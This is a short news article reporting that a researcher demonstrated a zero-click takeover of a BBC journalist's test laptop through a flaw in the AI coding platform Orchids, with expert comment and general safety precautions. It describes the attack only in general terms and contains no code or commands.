Home > Technology > Hacker Seizes Laptop Using AI App Without a Single Click, Raising Zero-Click Security Concerns
Hacker Seizes Laptop Using AI App Without a Single Click, Raising Zero-Click Security ConcernsToday, 07:43. Posted by: taiba |
|
A serious security vulnerability has been discovered in “Orchids,” a fast-growing AI-powered “vibe-coding” platform that allows users to build applications by typing instructions into a chatbot. The flaw was demonstrated when a hacker exploited it to gain instant control of a BBC journalist’s laptop, highlighting the platform’s potential risks. The attack occurred in seconds without requiring any downloads, clicks, or warnings, exposing a significant zero-click threat in AI coding environments. Cybersecurity researcher Etizaz Mohsin revealed the vulnerability by using a small modification in the AI-generated code on a test project running on a spare device. The platform accepted the change automatically, and within moments, the laptop was visibly compromised: a file appeared on the desktop, the wallpaper changed to a skull with a robot design, and a message stating “You are hacked” was displayed. The exploit bypassed traditional security mechanisms such as malicious links or file downloads, giving the attacker full remote access. This could allow viewing files, installing monitoring software, or even activating cameras and microphones. Mohsin emphasized that the convenience of AI tools executing commands autonomously comes with inherent risks. Orchids, founded in 2025 and boasting roughly one million users, acknowledged that warnings may have been missed due to its small, overextended development team. Experts, including Ulster University Professor Kevin Curran, warn that AI-generated projects often lack rigorous testing, meaning vulnerabilities can propagate across multiple builds. Because agentic AI tools execute complex instructions directly on user devices, even minor coding defects can lead to full system compromise. Security professionals recommend practical precautions for users of AI coding platforms. Experimental tools should be run on isolated devices, AI accounts should be limited or disposable, and all permissions should be carefully reviewed before granting an AI full access. As AI-powered development becomes more common, ensuring strict security controls and thorough oversight is essential to prevent zero-click exploits from affecting wider audiences. Go back |